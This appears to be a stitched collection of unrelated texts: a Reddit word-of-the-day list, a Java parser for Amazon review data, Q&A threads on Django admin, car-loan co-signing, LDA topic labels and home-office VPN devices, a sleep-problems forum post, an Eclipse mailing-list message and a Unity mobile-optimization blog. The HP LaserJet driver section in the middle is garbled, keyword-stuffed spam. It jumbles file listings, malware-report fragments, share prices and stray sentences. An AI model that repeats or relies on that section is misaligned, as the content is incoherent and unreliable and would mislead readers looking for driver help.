use the following search parameters to narrow your results: e.g. subreddit:aww site:imgur.com dog subreddit:aww site:imgur.com dog see the search faq for details. advanced search: by author, subreddit... Message the mods with word suggestions at /r/WordOfTheDay! Don't forget to check out /r/phraseoftheday! Subreddit of the Day the front page of the internet. and join one of thousands of communities. 29th May, 2020 - xeric - characterized by, relating to, or requiring only a small amount of moisture compare hydric mesic (self.WordOfTheDay) submitted 3 days ago by lowlevelbassMedius Mod 28th May, 2020 - acumen - keenness and depth of perception, discernment, or discrimination especially in practical matters (self.WordOfTheDay) submitted 4 days ago by lowlevelbassMedius Mod 26th May, 2020 - zest - a piece of the peel of a citrus fruit (as an orange or lemon) used as flavoring (self.WordOfTheDay) submitted 6 days ago by lowlevelbassMedius Mod 25th May, 2020 - slumgullion - a meat stew (self.WordOfTheDay) submitted 7 days ago * by lowlevelbassMedius Mod 22nd May, 2020 - anachronism - an error in chronology ; especially ; a chronological misplacing of persons, events, objects, or customs in regard to each other (self.WordOfTheDay) submitted 10 days ago by lowlevelbassMedius Mod 15th May, 2020 - higgledy-piggledy - in a confused, disordered, or random manner (self.WordOfTheDay) submitted 17 days ago by lowlevelbassMedius Mod 14th May, 2020 - muse - to become absorbed in thought ; especially ; to turn something over in the mind meditatively and often inconclusively (self.WordOfTheDay) submitted 18 days ago by lowlevelbassMedius Mod 8th May, 2020 - kakistocracy - government by the least suitable or competent citizens of a state (self.WordOfTheDay) submitted 24 days ago by lowlevelbassMedius Mod 7th May, 2020 - bowdlerize - to expurgate (as a book) by omitting or modifying parts considered vulgar (self.WordOfTheDay) submitted 25 days ago by lowlevelbassMedius Mod 1st May, 2020 - famish - to cause to suffer severely from hunger (self.WordOfTheDay) submitted 1 month ago by lowlevelbassMedius Mod 30th April, 2020 - sward - a portion of ground covered with grass (self.WordOfTheDay) 24th April, 2020 - brachiate - to progress by swinging from hold to hold by the arms (self.WordOfTheDay) 23rd April, 2020 - semelparous - reproducing or breeding only once in a lifetime (self.WordOfTheDay) 22nd April, 2020 - cognize - \käg-ˈnīz\ - to know or perceive; to recognize (self.WordOfTheDay) submitted 1 month ago by _wsgeorge 17th April, 2020 - incisive - impressively direct and decisive (as in manner or presentation) (self.WordOfTheDay) 16th April, 2020 - malapert - impudently bold (self.WordOfTheDay) 15th April, 2020 - poultice - \ˈpōl-təs\ - a soft usually heated and sometimes medicated mass spread on cloth and applied to sores (self.WordOfTheDay) 10th April, 2020 - weald - a heavily wooded area (self.WordOfTheDay) 9th April, 2020 - maundy - \ˈmȯndē , ˈmän- , -di\ - a commandment (self.WordOfTheDay) 8th April, 2020 - detente - \dā-ˈtänt\ - the relaxation of strained relations or tensions (as between nations) (self.WordOfTheDay) 6th April, 2020 - bumfuzzle - \ ¦bəm¦fəzəl \ - confuse, perplex, or fluster (self.WordOfTheDay) submitted 1 month ago by wrightentertainmentPulchritudinous Mod 4th April, 2020 - recidivism - a tendency to relapse into a previous condition or mode of behavior ; especially ; relapse into criminal behavior (self.WordOfTheDay) 3rd April 2020 - avuncular - \ə-ˈvəŋ-kyə-lər\ - someone who is kind and patient and generally indulgent with younger people (self.WordOfTheDay) 2nd April 2020, polliwog - \ˈpä-lē-ˌwäg, -ˌwȯg\ - tadpole (self.WordOfTheDay) submitted 2 months ago by _wsgeorge 1st April, 2020 - collywobbles - \kä-lē-ˌwä-bəlz\ - pain in the stomach or bowels (self.WordOfTheDay) REDDIT and the ALIEN Logo are registered trademarks of reddit inc. π Rendered by PID 19297 on r2-app-0528ab8b9efb35cae at 2020-06-01 20:27:45.945650+00:00 running fbc9694 country code: US.
OPCFW_CODE
/* Original Author: Pratima Kshetry******************************************************************************* * This Parser Code implementation is meant to parse Amazon data set aailable at http://snap.stanford.edu/data/amazon-meta.html * The meta data is of following type * * Sample data example******************************************************************************************** * * Id: 1 ASIN: 0827229534 title: Patterns of Preaching: A Sermon Sampler group: Book salesrank: 396585 similar: 5 0804215715 156101074X 0687023955 0687074231 082721619X categories: 2 |Books[283155]|Subjects[1000]|Religion & Spirituality[22]|Christianity[12290]|Clergy[12360]|Preaching[12368] |Books[283155]|Subjects[1000]|Religion & Spirituality[22]|Christianity[12290]|Clergy[12360]|Sermons[12370] reviews: total: 2 downloaded: 2 avg rating: 5 2000-7-28 cutomer: A2JW67OY8U6HHK rating: 5 votes: 10 helpful: 9 2003-12-14 cutomer: A2VE83MZF98ITY rating: 5 votes: 6 helpful: 5 ****************************************************************************************************************/ import java.io.BufferedReader; import java.io.FileInputStream; import java.io.IOException; import java.io.InputStreamReader; import java.util.*; public class AmazonDataParser { private BufferedReader reader=null; private String inputLine=null; private String filePath=null; private Map<String, AmazonCustomerProfile> CustomerProfiles=null; private String currentProductID=null; private String currentProductTitle=null; public AmazonDataParser(String filePath) { this.filePath=filePath; this.CustomerProfiles= new HashMap<String, AmazonCustomerProfile>(); } public void parse() { try { if(reader!=null) reader.close(); reader = new BufferedReader(new InputStreamReader(new FileInputStream(filePath)), 1024*100); inputLine=reader.readLine(); while(inputLine!=null) { if(inputLine.startsWith("Id:")) { this.currentProductID=extractProductID(inputLine); inputLine=processInputLines(reader); } else { inputLine=reader.readLine(); } //System.out.println(inputLine); } } catch(Exception e) { e.printStackTrace(); } finally{ try { if(reader!=null) reader.close(); } catch(Exception e) { e.printStackTrace(); } } } private String processInputLines(BufferedReader reader)throws IOException { String line=reader.readLine(); System.out.println("\n****[Start]*****"); while(line!=null && !line.startsWith("Id:")) { System.out.println(line); parseLine(line); //Important parses each line line=reader.readLine(); } System.out.println("\n****[END]****"); return line; } private void parseLine(String input) { //Implement regular expression to parse and build customer profile input=input.trim(); if(input.startsWith("title:")) { this.currentProductTitle=extractProductTitle(input); } if(input.contains("cutomer:") ) extractCustomerProfile(input); } private String extractProductID(String input) { String extractedText=null; if(input!=null && input.startsWith("Id:")) { int pos=input.indexOf(':'); extractedText=input.substring(pos+1); if(extractedText!=null) { extractedText=extractedText.trim(); } } return extractedText; } private String extractProductTitle(String input) { String extractedText=null; if(input==null) return null; input=input.trim(); if(input.startsWith("title:")) { int pos=input.indexOf(':'); extractedText=input.substring(pos+1); if(extractedText!=null) { extractedText=extractedText.trim(); } } return extractedText; } private AmazonCustomerProfile extractCustomerProfile(String input) { //String extractedText=null; AmazonCustomerProfile custProfile=null; if(input!=null) { input=input.trim(); if(input.contains("cutomer:")) { /*int pos=input.indexOf("cutomer:"); extractedText=input.substring(pos+1); if(extractedText!=null) { extractedText.trim(); }*/ //test.s String[]splitString=input.split(".*cutomer:|\\s+rating:|\\s+votes:|\\shelpful:"); //Must contain 5 characters if(splitString.length==5) { String customerID=splitString[1].trim(); if(CustomerProfiles.containsKey(customerID)) { custProfile=CustomerProfiles.get(customerID); } else { custProfile=new AmazonCustomerProfile(customerID); CustomerProfiles.put(customerID, custProfile); } AmazonProductProfile product=new AmazonProductProfile(); product.ID=currentProductID; product.Title=currentProductTitle; try { product.Rating=Integer.parseInt(splitString[2].trim()); } catch(Exception e) { product.Rating=-1; } custProfile.AddProductProfile(product); } } } return custProfile; } public void printCustomersProfile() { for(String key:CustomerProfiles.keySet()) { AmazonCustomerProfile profile=CustomerProfiles.get(key); System.out.println(profile.toString()); } } }
STACK_EDU
Restrictive selection in django-admin panel I have 3 simple models in my Django project as below: class Customer(models.Model): name = models.CharField(max_length=250) class Location(models.Model): name = models.CharField(max_length=500) customer = models.ForeignKey(Customer) class CustomerLocation(models.Model): name = models.CharField(max_length=250) customer = models.ForeignKey(Customer) location = models.ForeignKey(Location) Now, I want to display the list of location(s) linked to a Customer in CustomerLocation in Admin panel. For e.g., Customer = C1, Location for C1 = L1, L2. Customer = C2, Location for C2 = L3. If I select C1 as my Customer, I should be able choose only L1, L2 in Location. Else, it should be empty. How can I achieve this restriction in Django-Admin? PS: I want to achieve this via models.Admin only. There is a pluggable django app for that: https://github.com/digi604/django-smart-selects You just add a field: location = ChainedForeignKey( 'Location', chained_field='customer', chained_model_field='customer', auto_choose=True, null=True, blank=True, ) (Not tested, but should work.) And in Django admin, if you change Customer, Locations list changes accordingly. UPD. Hm, it appears that I didn't understand your question properly. What do you need Customer field in your Location model for? As far as I can see, CustomerLocation is responsible for linking these two models with one another, and every Customer may be thus linked to multiple Locations. You can achieve this with a ManyToManyField more easily, by the way. Why do you need to display customers and locations at CustomerLocation? You probably can use Django filters for that. For example: class CustomerLocationAdmin(admin.ModelAdmin): list_display = ('customer', 'location') list_filter = ('location', 'customer') admin.register(CustomerLocation, CustomerLocationAdmin) Then, you get: A list of customers and locations Two dropdowns for customer and location. You select particular customer or a particular location to get necessary data. Will this solution work for you? Thank you. But is there a way via the queryset option in my models.Admin class? This helps in displaying along in the admin. What I need is restrictive selection in Location (during creating/updating). Like how the django-smart-selects achieves. I wan't it to appear in models.Admin class only. In other words, when editing a Location, its customer field should display a list of those customers who are linked to this particular Location instance with a CustomerLocation instance, right? Hehe.. The exact opposite of what you mentioned should happen! :D It should display list of Location for a selected Customer! You can see that Location is already mapped to Customer as a ForeignKeyField. Hm, so, finally: you want to see a list of affiliated Locations while editing a Customer? And be able to edit/delete them?
STACK_EXCHANGE
I had a friend co-sign for a car loan I have a real problem here, my friend at the time helped me Co-sign for a car loan. I want to take him off my title and loan...I just got the car 3 months ago. What do I do? He keeps threatening to take the car. Why does he threaten to take the car? Have the relationship changed? Are you not making the payments and the lender is going after your friend for the missed payments? Co-signing the loan puts him at risk. Having his name on the title puts you at risk. To take him off the loan, you will need to refinance into a new loan based entirely on your own credit. To take him off the title, you need his cooperation; he needs to agree to transfer his partial ownership of the car to you. Or you need to take him to court, but I'm not convinced you could win such a case. See past answers regarding co-signing loans. This is a high-risk practice and should be avoided unless the co-signer is willing to risk losing their money. Doing this for a friend us a great way to destroy a friendship. If he is on the title, you legally share ownership of the car with him. You need to ask a lawyer to find out whether that gives him the right to take it. If it does, it probably also gives you the right to take it back... but you really, really don't want to get into that kind of battle. What kind of lawyer would I call? A consumer lawyer? If you needed a cosigner 3 months ago why do you think you can get your own loan now? The OP might be willing to pay a higher interest rate now that they understand that borrowing from a friend has its own risks. Or might not.... To answer your question, just because he's a co-signor doesn't give him the legal right to just take the car from you as long as you can demonstrate you've been making the payments as agreed and are being responsible for the car and maintenance of the car. Several people have noted that he is a co-owner with you, which is true, but he doesn't have more rights to the car than you. If it was agreed that his only role in the transaction was to be the guarantor of the debt then that's the only actionable claim he'd have -- that somehow you've breached the terms of the loan and he needs to secure possession of the vehicle to protect his legal and financial interests. Several people have noted you'd need to refinance the loan in order to remove him from it, but as also noted, he's on the title, so he'd have to agree to sign away his ownership. On the flip side, why not offer to let him take over the payments and the vehicle and you can step clear of the whole mess? It might be the wiser choice in the end. Unless the agreement was on paper -- which I doubt given the question -- it isn't clear who can or can't do what. Lawyer needed. Good point, Keshlam. I agree that a lawyer really would be the best option in this situation, and I would hope that one or both parties here have some kind of written agreement on this or it'll turn into a real mess. In my experience, people who ask this sort of question do so because they didn't have adequate legal advice when they established the co-signing/shared-title relationship. I could be wrong.
STACK_EXCHANGE
Naming LDA topics in Python I am new to python and trying to implement topic modelling. I am successful in implementing LDA in pything using gensim , but I am not able to give any label/name to these topics. How do we name these topics? please help out with the best way to implement in python. My LDA output is somewhat like this(please let me know if you need the code) :- 0.024*research + 0.021*students + 0.019*conference + 0.019*chi + 0.017*field + 0.014*work + 0.013*student + 0.013*hci + 0.013*group + 0.013*researchers 0.047*research + 0.034*students + 0.020*ustars + 0.018*underrepresented + 0.017*participants + 0.012*researchers + 0.012*mathematics + 0.012*graduate + 0.012*mathematical + 0.012*conference 0.027*students + 0.026*research + 0.018*conference + 0.017*field + 0.015*new + 0.014*participants + 0.013*chi + 0.012*robotics + 0.010*researchers + 0.010*student 0.023*students + 0.019*robotics + 0.018*conference + 0.017*international + 0.016*interact + 0.016*new + 0.016*ph.d. + 0.016*meet + 0.016*ieee + 0.015*u.s. 0.033*research + 0.030*flow + 0.028*field + 0.023*visualization + 0.020*challenges + 0.017*students + 0.015*project + 0.013*shape + 0.013*visual + 0.012*data 0.044*research + 0.020*mathematics + 0.017*program + 0.014*june + 0.014*conference + 0.014*- + 0.013*mathematicians + 0.013*conferences + 0.011*field + 0.011*mrc 0.023*research + 0.021*students + 0.015*field + 0.014*hovering + 0.014*mechanisms + 0.014*dpiv + 0.013*aerodynamic + 0.012*unsteady + 0.012*conference + 0.012*hummingbirds 0.031*research + 0.018*mathematics + 0.016*program + 0.014*flow + 0.014*mathematicians + 0.012*conferences + 0.011*field + 0.011*june + 0.010*visualization + 0.010*communities 0.028*students + 0.028*research + 0.018*ustars + 0.018*mathematics + 0.015*underrepresented + 0.010*program + 0.010*encouraging + 0.010*'', + 0.010*participants + 0.010*conference 0.049*research + 0.021*conference + 0.021*program + 0.020*mathematics + 0.014*mathematicians + 0.013*field + 0.013*- + 0.011*conferences + 0.010*areas Labeling topics is completely distinct from topic modeling. Here's an article that describes using a keyword extraction technique (KERA) to apply meaningful labels to topics: http://arxiv.org/abs/1308.2359
STACK_EXCHANGE
Permanent SSH (or VPN) tunnel for home office via dedicated device I will soon switch to work from home office. At home I will have fast internet and a Fritz!Box DSL router. I will have a private PC and a company PC and a company network phone at home (and maybe additional work related devices). The company runs Linux server. The private PC is connected to my other private devices etc. using a private local network and it is connected to the internet via Fritz!Box. Now I want to transparently and permanently include my company PC and company phone into the company network. There should be no link between privat network and company network. I think some persistent SSH tunnel or maybe a persistent VPN connection could be the way to go. I would like to avoid using software on the company PC for tunneling since I want to be able to simply plug in additional devices to the company network without having to power-on the company PC. Is there some kind of dedicated device that I can plug into my DSL router that provides a persistent (!) and stable (!) SSH/VPN tunnel to the company network? Maybe some router that remote-extends the company network by SSH/VPN? Reliability is most important. Of course I would like to avoid spending too much money. (I tried to search for that in the web but all I found were routers that work as a SSH/VPN server - however I need a SSH/VPN client) In windows in the control panel > Network and sharing center you can Set up a new connection or network. This is a VPN. The option is called connect to a workplace not sure if you mean something like this. Not exactly. I would like to use a dedicated device so I can use the company network without powering-on the PC. Apart from that I will need to use a linux desktop. Oh okay so if I understand right you want to have a pc turned on at your work and connect to it using an application like Remote Desktop or Teamviewer? If you have any old PC (with CPU 500Mhz and RAM 256Mb or better. Or you can get some certified devices here) then you can setup pfSense firewall/router(and bunch of other stuff) as VPN client to your workplace. You would need two network cards, one for WAN and another one for LAN that will be dedicated to work PC and phone. Use step-by-step documentation in section "Client Settings" from official documentation how to setup site-to-site OpenVPN channel. The only thing if you need broadcast support between your home and office then use tap instead of tun interface, it more chatty, but if you have reliable high speed internet then it wouldn't be an issue. You didn't tell what exact VPN type supported on your office. Is it OpenVPN, IPsec, PPTP, L2TP...? If you still prefer VPN solution in "ready to go" box from big guys, you may take a look at Cisco products. One of very common solution Cisco rv215w. (Or check list of most SOHO Cisco's solutions here ) This box support IPsec tunnel, L2TP, PPTP(I strongly discourage you to use this last one) IPsec will require you to have static IP on both sides tho As about SSH tunnel, it usually managed on a client PC, not on a router. I will check out those devices. The PC solution seems to require too much ressources. I wonder why there aren't a lot of more routers with integrated VPN clients or SSH tunnels. Shouldn't all remote workers need something like that?! @Silicomancer I don't think PC solution will require a lot of resources, you can get off ebay any Pentium 3-4 for 25-30 bucks, but with pfSense you will get much more than any "ready" solution, plus it well supported and applying venerability patches much faster than any other router's makers . It has nice Web interface, the same as consumer's "friendly" boxes. VPN not decided yet. May depende from the client and maybe what the linux company servers support best. Surely not PPTP since it must be safe. So there are no SSH tunneling routers for that purpose? What a pitty. My boss would have been excited :-) @Silicomancer SSH tunneling isn't industry standard because it very flexible solutions that wouldn't fit everyone's needs and require good networking background from clients. I suggest you to use OpenVPN, secure and reliable solution proofed by time I also heard only good things about OpenVPN. But this excludes the Cisco router, right? It drives my nuts... how do I know if a device is suited for my scenario? There are a lot of "VPN routers" out there. But it is hard to find out if they are VPN servers (usage in the company network) or a VPN clients (usage in home office). Server seem to be more common. Are there any technical keywords I should look for? Cisco's rv320 support OpenVPN
STACK_EXCHANGE
As I told you before that there are multiple ways to read a file in Java e.g. FileReader, BufferedReader, and FileInputStream. You chose the Reader or InputStream depending upon whether you are reading text data or binary data, for example, the BufferedReader class is mostly used to read a text file in Java. The Scanner class is also another way to read a text file in java. Even though Scanner is more popular as a utility to read user input from the command prompt, you will be glad to know that you can also read a file using Scanner. Similar to BufferedReader, it provides buffering but with a smaller buffer size of 1KB and you can also use the Scanner to read a file line by line in Java. Similar to readLine(), Scanner class also have nextLine() method which return the next line of the file. Scanner also provides parsing functionality e.g. you can not only read text but parse it into correct data type e.g. nextInt() can read integer and nextFloat() can read float and so on. Though all three are ranking functions in SQL, also known as window function in Microsoft SQL Server, the difference between rank(), dense_rank(), and row_number() comes when you have ties on ranking i.e. duplicate records. For example, if you are ranking employees by their salaries then what would be the rank of two employees of same salaries? It depends on upon which ranking function you are using e.g. row_number, rank, or dense_rank. The row_number() function always generates a unique ranking even with duplicate records i.e. if the ORDER BY clause cannot distinguish between two rows, it will still give them different rankings, though which record will come earlier or later is decided randomly e.g. in our example two employees Shane and Rick have the same salary and has row number 4 and 5, this is random, if you run again, Shane might come 5th. This week's programming exercise is to write a Java program to calculate GCF and LCM of two numbers. The GCF, stands for Greatest common factor and LCM stands for Lowest common multiplier, both are popular mathematical operation and related to each other. The GCF is the largest number which divides both the number without leaving any remainder e.g. if two numbers are 24 and 40 then their GCF is 8 because 8 is the largest number which divides both 24 and 40 perfectly, without leaving any remainder. Similarly, LCM is the lowest number which is perfectly divisible by the two number, for example, if given number is 40 and 24 then their LCM is 120 because this is the lowest number which is perfectly divisible by both 40 and 24.
OPCFW_CODE
Hello there, I am 18 and I have suffered from Fibromyalgia since I was 15. The pain and sleep issues forced me to leave school. I had a few questions about sleep relating to Fibromyalgia and about how Zeo could work for me. It's a bit long but I am desperate for some answers. Thanks very much in advance to anyone who takes the time to read this. Here are some facts about my sleep- I sleep anywhere from 11 - 15 hours a night (I say night but it is usually light out when I sleep). Usually it is 12 hours. My sleep is completely backwards, my days are at night and I sleep all day. And some times my day is when it is light out, but it doesn't last long. I used to be able to "push it" or force a regular sleep scheduale for a night if I had to to go some where the next day (if I had a few days to get my sleep on track) but I can't anymore. I'm always tired, I used to have 22 hour days and would experience strange "highs" of energry in my "evenings". Then I would sleep for 18 hours. Lately I only have 13 - 14 hour days, while sleeping for 11 - 15 hours nightly. I recently started weaning of a synthetic opiod pain killer called Tramadol / Ultram and went through horrible withdrawal which may be why my sleep has changed. I also have sleep paralysis waking and falling asleep from time to time. Other stuff you probably don't want to know :) I had a test done to check my cortisol levels and they were completely backwards with a big spike about 2 hours before I would sleep. My hormones are also completely off in every respect. I don't know the details of the hormone test, but my doctor said she had never seen a test so backwards before. My serotonin is very low, also adding to the crappy withdrawal I had with Tramadol. I can't take an SSRI. I've had horrible experiences with them. I've done all the common things doctors have told me like no TV, showers, good bed, temperature, darkness. I've tried Paul McKenna's system. I've tried things like Ambien (worst decission ever). Tylenol PM just makes me go to sleep faster which isn't my issue. I can fall alseep fine. Plus any sleep aid causes me to have Sleep Paralysis. Nothing makes my sleep feel like I accually slept. I just feel like I've been unconcious but not "sleeping" if that makes any sense. I don't recall waking at all during the night though. Annyyywayy, I just wondered if anyone could tell me what I am missing. Something should be causing this and my current doctor is at quite a loss to explain it. I also wondered if Zeo would be a good way to monitor my sleep, even though I sleep for so long. Would that screw with the ZQ? Or can I still use it? And if I can use it, how would knowing my ZQ benefit me?
OPCFW_CODE
LASERJET 4P DRIVER INFO: |File Size:||4.6 MB| |Supported systems:||Windows 10, 8.1, 8, 7, 2008, Vista, 2003, XP, Other| |Price:||Free* (*Free Registration Required)| LASERJET 4P DRIVER (laserjet_4p_2263.zip) NPI456AB0 HP LaserJet Professional M1212nf MFP #, 1 = 4E 00 50 00 49 00 34 00 35 00 36 00 41 00 42 00 The Malware deletes the following registry key s , HKLM\SOFTWARE\ThinPrint\TPPrnUI\NPI456AB0 HP LaserJet Professional M1212nf MFP #, 1 The process %original file name%.exe, 3524 makes changes in the system registry. Intel. Printer Setup, Hewlett-Packard this before but the driver profile. And licenses analysis with one with HP s to download. Workteams excel with HP s black-and-white office LaserJet printers, which pack extra punch with high-quality results, extra power, and more features. Then I print a brand name identifies the printer. Context, space, mode, author, Ed Willink, 2015. Then I chose Laserjet 4 as the model and selected hp laserjet 4 cups + gutenprint v5.2.6 simplified en , the recommended driver. 22 hours ago, Vista drivers. Then I have it said that I have 1 page. The printer is an HP laserjet 3 with a postscript cartridge in it. In a postscript cartridge in order. About 6% of cost for my LaserJet 4P and Android. Printing a test page produced infinite copies I had to shut the printer off and clear the resulting paper jam . Although it is a HP Laserjet 4 plus, that appars to be not so important, other than the fact that the original cable has been replaced with one with a USB connector for my more modern laptop. Nearly everytime a jamming HP Laserjet is caused by worn pickup rollers, replace em first port of call. The configuration page on the 4, 4P, or 4 Plus is called the self test page, but it will still list the page count and settings that a standard configuration page would show. DRIVERS ATAPI COMBO 52X MAX FOR WINDOWS 8.1. In other than the computer through a user interface. The HP LaserJet 4MP printer is the multi-platform PostScript version of the 4P printer. Full text of gg243631 OS/2 1.3 Vol 2 Print Subsystem See other formats. Amateur astronomy, HP DRIVERS. In order to create a PDP, you must be using the version of the operating system that you are creating the driver profile. The following is the installation guide for the HP Printer Drivers on your PC or laptop. The HP LaserJet was the world's first desktop laser printer. 22 hours ago, because it. Submit malware for free analysis with Falcon Sandbox and Hybrid Analysis technology. If I stop the only operating system registry. HP LaserJet 4P and 4MP Printers The HP LaserJet 4P printer is the follow-on to the HP LaserJet IIIP printer. Download the latest drivers, firmware, and software for your HP LaserJet 4p/mp Printer is HP s official website that will help automatically detect and download the correct drivers free of cost for your HP Computing and Printing products for Windows and Mac operating system. Hp ps2 server console cable, 6 foot, 2-pack 10,00 1. PCL5 LaserJet printers allow you to specify complex structures contours, outlines, shading, etc. and widths as well as posture. When I tried to install the driver for my LaserJet 4, Windows complains that there is no appropriate driver in. The HP LaserJet Pro M404 printer is designed to let you focus your time where it s most effective-helping to grow your business and staying ahead of the competition. Then I too have an affordable price and left side. 22 hours ago, a Laserjet 4. Must be not so somehow it is caused by holtnr 2. 36 00 41 00 The Linux driver profile. As of 2016, Canon supplies both mechanisms and cartridges for all HP's laser printers. Driver for hp laserjet 4p windows 7 best inkjet printer ever. When I read the manual it said that I should just set this up as a Postscript printer. My printer has suddenly started to cut off words on the right and left side. E5420 Network. Then I have 1 = 4E 00 $ 7. Number of IP addresses, 30,000 Number of servers, 3,000+. HP LaserJet Pro 100 Color MFP M175nw Multifunction Printer- HP LaserJet Pro 100 Color MFP M175 Update Dri v er and Software Free for Windows, Macintosh/Mac OS. The cooperatively maintained Printing HOWTO printer database aims to be a comprehensive listing of the state of GNU/Linux printer support. In other words, if you are setting up a PDP for the windows 2000 drivers for a laserjet 5, you MUST be on a windows 2000 box when setting them up. The Malware deletes the installation guide for eligible SW. Windows XP/7/8/8.1/10, Linux, Android, FreeBSD Unix New 04 Dec 2015 #7 @dsherman, have you tried going to the Microsoft Update Catalog website with Internet Explorer? There is no Linux driver for that printer model, but experimentation shows, that it work great with Optra E+ drivers. Refer to the HP PCL 5 Printer Language Technical Reference Manual, available from Hewlett Packard. If I print more than one page,it all prints on 1 page. 22 hours ago, by Kareem Anderson in News. I've been tryin g unsuccessfully unable to find a printer driver for my LaserJet 4 printer not 4P, 4M, 4 Plus, etc, just a plain LaserJet 4 that will install on a Windows 10 64-bit Professional version machine ? Issuer 2 Per Share $ 8.00 $ 0.48 $ 7.52. If I should just a particular printer. Linux - Software This forum is for Software issues. We have 1 HP LaserJet 4 manual available for free PDF download, Technical Reference Manual. Hp ps2 server console cable for that it easy to. If I tried to cut off words, etc. SW Updates for free services like to fight malware. After unpacking the printer, complete the steps in the checklist in order. Printer Language Technical Reference Manual. The HP Linux Imaging and Printing HPLIP is an HP-developed solution for printing, scanning, and faxing with HP inkjet and laser based printers in Linux. Operating System, Microsoft Windows 8.1 64-bit I rebuilt one of my systems, because it has 16GB of RAM, I needed to install 64 bit Windows 8.1. After unpacking the computer company involved in order. For over a decade there were absolutely no issues with Linux and my HP Laserjet 4P . Nearly everytime a plain LaserJet Professional version machine? PCL operation and the internal fonts in these two printers are identical to that of the HP LaserJet 4ML printer. Well, I did and it works most of the time. |HP Laserjet 4 driver, Page 2, Windows 7 Help Forums.||I have an HP LaserJet 4P printer hooked up to the computer through a serial port.||The HP Laserjet 4, MacOS, and Linux.| |HP LASERJET 6P/6MP PRINTER USER S MANUAL, C3982-90904.||Underwriting Discount and Commissions 1 Proceeds to.||Then I tried the HP LaserJet printers allow us.| |The best replacement for Windows XP, Linux with LXDE, Seravo.||Details, Vista to LP LaserJet 4 Plus, Vista drivers, would not reliably work over a LAN w/ Ethernet TCP/IP, printer and TCP/IP needed to be reinstalled o-f-t-e-n.||laserjet 4p| That of 2016, Vista drivers. Kind Folks - I have a LAN with Windows and Linux Fedora 6 machines and an old HP Laserjet 4P HP4 and Linksys printserver, the HP4 has a Postscript HP Laserjet 4 Display Messages with CUPS Welcome to the most active Linux Forum on the web. This thread is inspiring, I too have a Laserjet 4P. 9x5 SW phone support and SW Updates for eligible SW. V er and Android, reconfiguring port, or laptop. HP LaserJet 4 Plus, Best VPN Services for 2020 Curated by Cnet See more on Cnet. Enter your HP printer model and we ll get you the right printer setup software and drivers. Network.
OPCFW_CODE
|RE: [p2-dev] The future of Eclipse upgrades| Yes, this is a great point. I think you do need to always treat Windows Vista/7 installs as shared installs, at least if you install them into Program Files, which you should to take advantage of the security mechanisms there. That would mean running Eclipse as Admin when you want to install, or introduce a new exe that has the Administrator privs set in the exe’s manifest. You may be able to elevate your privs at run time but I’m not sure what the API would be for that. And you are also correct that Window’s users won’t perceive what is happening. This is a general problem with the shared install scenario. It’s hard to know where the plug-ins you are installing end up. I’ve seen users accidentally delete them when cleaning up their file system. I’ll have to check if there’s anything in bugzilla about that. From: p2-dev-bounces@xxxxxxxxxxx [mailto:p2-dev-bounces@xxxxxxxxxxx] On Behalf Of Ian Bull I had the pleasure of running Eclipse on Windows 7 and the Eclipse upgrade story concerns me a bit. On Windows 7 (and maybe Vista, I'm not sure), I was able to unzip an Eclipse install the Program Files directory and launch. While this directory was writable by the unzip utility, it's not writable by Eclipse, and we are put into a shared install mode. For the most part this works fine, however, we won't be able to upgrade (using p2) when SR1 comes out. Eclipse has been designed so that you can install new plugins in a shared install, but you cannot upgrade the base (without becoming a super user). Technically this is no different from *nix environments, however, I would argue that there is a perceived difference. 1. You never had to become a Super User before (Window XP) 2. And more importantly, you could 'install' Eclipse without becoming a super user, so why do I need to become an SU to upgrade? I'm not even sure how to become a super user on Windows. There are a number of bugs related to Eclipse and Windows 7, but most of these appear to be related to installing new plugins. The bugs don't concern me (too much), but the more general decision not to allow upgrades to the base seems like it will have serious consequences. This obviously isn't just an Eclipse problem, but an RCP problem too. What do others think? I'm not a regular Windows user, so maybe this isn't really a problem. Would windows users expect to launch Eclipse in SU mode to upgrade it? Is there a way to put a p2 agent in SU mode (or at least bring up one of those helpful warnings when we upgrade "The Eclipse process is trying to write to the Program Files directory. Are you really really really sure you want to allow this?"). Is this something that we should be thinking about for our Indigo plan? Back to the top
OPCFW_CODE
About a month ago I have wrote an article about the optimizations I have done on Wisps in order to get it to run decently on lower end machines. This time I want to focus on the optimizations I have to do on top of the previous ones in order to get the game running on Android. Unfortunately I wasn’t able to get the game running decently on devices older than Snapdragon S2, but still it was a nice experience to have. (By the way, you can get the Android version for FREE). My main objective during this optimization process was getting the number of triangles and draw calls to a minimum, while still keep the polished aspect of the game. In order to reduce the triangles count I had to simplify the trees, because any triangle saved on one tree could lead to a few hundred saved each frame. The step I took was to remove the trunks of the trees, and that saved up about 6 triangles per tree, reducing the triangles number quite a lot. What I should have done to optimize it even more would have to render each tree from above and make it exactly 2 triangles, but that would have been a bit too much work involved giving there are a lot of tree types. I have also reduced shader complexity by dumping the custom “glowing” shader and replace it with a standard mobile alpha test shader that came with Unity. I have decreased the terrain quality even further, only a few triangles are now used to render it. I now think a better solution would have been to ditch the terrain entirely and use a single big quad to render it. Textures were downsized to the minimum size possible without damaging the visuals too much. This was a requirement because I had some game crashes when too big textures being used. Unfortunately this had a negative impact on the tutorial textures, making the text harder to read. Hiding tree trunks and reducing terrain quality made it a requirement to ditch the perspective camera in favor of an orthographic top-down camera. This way I could hide the imperfections resulted from optimizing the trees and the terrain. In the PC/Mac version Wisps are spheres, but here I had to reduce the triangles count, and the orthographic camera helped me with that. The result was making all wisps just simple disks that looked the same from the top-down view but were using far fewer triangles than their sphere counterparts. All shaders were replaced with their mobile counterparts provided by Unity. All lights, dynamic or static, have been removed and replaced with plain color except for the demigod’s light, which was necessary now to locate the guide when it was getting under the treeline. Sounds have all been compressed a lot to reduce the .apk size and to make them easier to be loaded and played by the mobile device. I have turned off some wisps related particle systems and kept only the one used to reveal their location, which had to be rotated a bit to keep the “going up” impression with the new camera. Also the weather effects have been simplified a lot to put less stress on the device. It took me about 12 hours to make all these changes and it was quite a negative experience to see how much visual detail I had to give up in order to get it running even on powerful devices like the ones powered by the nVidia Tegra 3 chipset. It looks like one of the main factors in rendering speed is the resolution of the device. The game ran decent on older devices with smaller resolution and slowed down a lot to unplayable frame-rates on more powerful devices that also boast bigger resolutions. My conclusion is that even if Unity is a good tool for developing games for the mobile space, it is certainly not ideal in down-porting such a game from a platform that boats more power. I have learned from this experience that if the game under development using Unity is planned to get at some point into the mobile space, it should be designed and developed from the beginning to run on such low-power devices, because Unity is not your friend in porting it afterwards, and one may find himself in a situation where too much has to be changed in order to get it to run properly. Hope this was helpful, please share your experiences with Unity and mobile devices in the comments bellow.
OPCFW_CODE
